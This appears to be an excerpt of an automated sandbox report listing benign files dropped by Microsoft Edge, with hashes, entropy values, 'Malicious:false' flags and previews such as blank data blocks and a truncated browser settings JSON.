                                                                                                                                                      SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                      SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                      SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):270336
                                                                                                                                                      Entropy (8bit):8.280239615765425E-4
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                      MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                      SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                      SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                      SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.011852361981932763
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsHlDll:/H
                                                                                                                                                      MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                      SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                      SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                      SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.012340643231932763
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsGl3ll:/y
                                                                                                                                                      MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                      SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                      SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                      SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):262512
                                                                                                                                                      Entropy (8bit):9.553120663130604E-4
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:LsNluLX:Ls3uLX
                                                                                                                                                      MD5:179E242941768512401C625B38DAB585
                                                                                                                                                      SHA1:BE023DA518ACD4D0E925506BCDDDE39AB7ADE7DC
                                                                                                                                                      SHA-256:13A7858E69123B4814E6FF7D1C3BA649C2860040B748F4A2FFC5275624DB3B00
                                                                                                                                                      SHA-512:2944B570EB32A739C17BF62998A855355680A3EEC4F9284ED9EF398E48200606CBC4E480CF3B0F805C48B23C3A39016D776A6A81010A5C74C5EB8CD72E0601A4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.........................................|%.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.01057775872642915
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsFl:/F
                                                                                                                                                      MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                      SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                      SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                      SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):270336
                                                                                                                                                      Entropy (8bit):8.280239615765425E-4
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                      MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                      SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                      SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                      SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.011852361981932763
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsHlDll:/H
                                                                                                                                                      MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                      SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                      SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                      SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8192
                                                                                                                                                      Entropy (8bit):0.012340643231932763
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:MsGl3ll:/y
                                                                                                                                                      MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                      SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                      SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                      SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):262512
                                                                                                                                                      Entropy (8bit):8.81240594570408E-4
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:LsNlwVe:Ls3wg
                                                                                                                                                      MD5:D03B0F83578064FA9BD6046A1C183C6D
                                                                                                                                                      SHA1:6882159F8268E6558324D62E6181A37AB606D097
                                                                                                                                                      SHA-256:1AF952D143C414E5AD2C4A416F9C5B96AFEAF77E85B18740C29948EE9977427A
                                                                                                                                                      SHA-512:32062CB4F7051DD529469955C4FBD3968F14DF2C1509318E2D98A23DE74134D6F15441AE16B93E8FA119BAF5D7CD8D4E879CDEDF65CC9C57C1B7570EEBC3D975
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.........................................=&.../.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):120
                                                                                                                                                      Entropy (8bit):3.32524464792714
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                      MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                      SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                      SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                      SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):13
                                                                                                                                                      Entropy (8bit):2.7192945256669794
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                      MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                      SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                      SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                      SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:117.0.2045.47
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
